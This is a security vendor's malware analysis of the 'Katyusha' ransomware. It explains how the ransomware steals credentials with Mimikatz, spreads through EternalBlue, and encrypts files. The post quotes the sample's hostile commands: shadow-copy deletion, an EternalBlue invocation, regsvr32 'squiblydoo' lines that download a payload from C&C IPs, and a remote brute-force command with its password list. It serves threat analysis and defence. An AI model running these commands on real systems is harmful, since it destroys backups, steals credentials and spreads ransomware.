For several months, Quick Heal Security Labs has been observing an increase in ransomware, we have found one more interesting ransomware which encrypts files and adds extension “.katyusha” and demands for an amount of 0.5 btc within three days and threatens to release the data to public download if the ransom is not paid. Malware is bundled with many components including using “Double pulsar” and “Eternal blue” exploit which is used to get spread over the network. Also, uses a unique attack technique called “squiblydoo” to spread over the network. The infection vector for this ransomware is still not confirmed, but on the basis of attribution this ransomware may enter the system via spear phishing, malvertising, spam mail, SMB exploit etc.
This malware is packed with MPRESS(v2.19) and present on victim’s system with the name “katyusha.exe” at “%temp%”. It contains three components. On execution it drops them into C:\Windows\Temp and starts their execution:
Katyusha checks for following files on the system to determine whether the system is already infected or not.
If a system is already infected, Katyusha creates a batch file (svchost0.bat) which contains code as shown in Fig.1. to delete self-copy and terminate itself. If the system is not infected then it drops zkts.exe and ktsi.exe and executes them.
This file is 7zip compressed executable and main component which contains multiple sub-modules like network spreading module, password stealing module, etc.
On the execution of zkts.exe, it extracts components in “C:\Windows\Temp” such as Mimikatz, katyusha.dll, eternal blue exploit, etc. those are later used by Katyusha to perform an activity.
This is another main component which is also MPRESS packed file. It is mainly used for file encryption and to drop ransom note on the victim’s system. This process is started independently by main payload (katyusha.exe) as shown in Fig 3.
On the execution of ktsi.exe, it firstly kills list of following tasks to release handles of files which are locked by relevant processes to encrypt(such as db files, etc) as shown in Fig 4.
To encrypt database related files successfully, ktsi kills processes which are related to database applications. Below is the list of processes hard-coded in malware:
Fig 4: Taskkill command execution.
After the taskkill operation malware drops ransom note in html and txt format at below path to make it visible for all users at system startup,
In “C:\ProgramData” and at the root of C drive(C:\) drop only ransom note as “_how_to_decrypt_you_files.txt”.
Ktsi.exe also deletes shadow copy by executing the following command,
“vssadmin delete shadows /all /quiet”
After all these tasks, ktsi.exe starts file encryption (RSA) with the help of standard encryption method of CRYPTOGAMS. Signatures related to this algorithm are found in a file, as shown in Fig 7.
It encrypts all extension files except the following one,
It also contains an exclusion list of files and folders (as shown in fig 9) if found these words in enumerated file path then it will exclude that path from encryption. To perform uninterrupted encryption, list contains names of few security products.
For network spreading, files extracted from zkts comes in role. Please refer Fig 2 for extracted components.
m32.exe and m64.exe are Mimikatz tool which are used to fetch credentials from windows lsass.exe.
Firstly, katyusha.exe determine whether the system is 64bit or 32bit using system call IsWow64Process (it returns a nonzero value if the system is 64 bit) and executes Mimikatz according to system architecture.
Mimikatz tool drops following files at “C:\Windows\Temp” as output.
– snamelog : contains fetched usernames.
– spasslog : contains passwords for respective fetched usernames.
After execution of mimikatz, katyusha.exe reads usernames from snamelog and passwords from spasslog which are used to perform brute force attack into the network.
Zkts.exe also drops svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll and svchostp.exe. These components are used to spread Katyusha over the network.
With the help of dropped eternal blue exploit and double pulsar, malware executes katyusha.dll on systems connected in network sequentially. For this katyusha.exe exploit SMB vulnerability with the help of the following command,
“C:\windows\temp\&svchostb.exe –TargetIp <ip_address> & svchostbs.exe –OutConfig s –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp <ip_address>”
Katyusha.dll is payload file contains code to execute the following command,
“regsvr32 /u /s /i:hxxp://220.127.116.11/img/katyusha.data scrobj.dll”
We can also find hard-coded strings of command in the file as shown in Fig 12.
Such attack with regsvr32 commands to download scriptlet from C&C and executes them is referred as “squiblydoo”.
After above action, It also goes to brute force systems in the network with the help of Power Admin Tool(svchostp.exe). This tool is similar to sysinternals PsExec tool, used to execute processes on remote system. This ransomware itself has the list of few usernames and passwords as given below, along with that it also uses usernames and passwords fetched by Mimikatz (snamelog and spasslog) for brute force attack.
Admin, administrator, +content of snamelog.
admin, 12345, chinachina203, 111, 123456, qwerty, test, abc123, 12345678, 0000, 1122, 1234, +contents of spasslog.
In brute forcing, katyusha uses the following command,
“C:\Windows\temp\svchostp.exe <ip_address> -u <username> -p <password> -n 10 -s regsvr32 /u /s /i:https://18.104.22.168/img/katyusha.data scrobj.dll”
The above command simply executes regsvr32 utility with url as a parameter to download payload and performs activity as explained above for katyusha.dll.
Bitcoin Wallet Address: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”
This year we have seen a spike in number of ransomware, they are using new ways to spread and also for encrypting the data. Now, most ransomware are bundled with exploit and tools like eternal blue, mimikatz for spreading over the network. We suggest users to avoid accessing suspicious Urls/emails, use strong system credentials and keep their antivirus up-to-date.
Subject Matter Expert:
Pratik Pachpor | Quick Heal Security Labs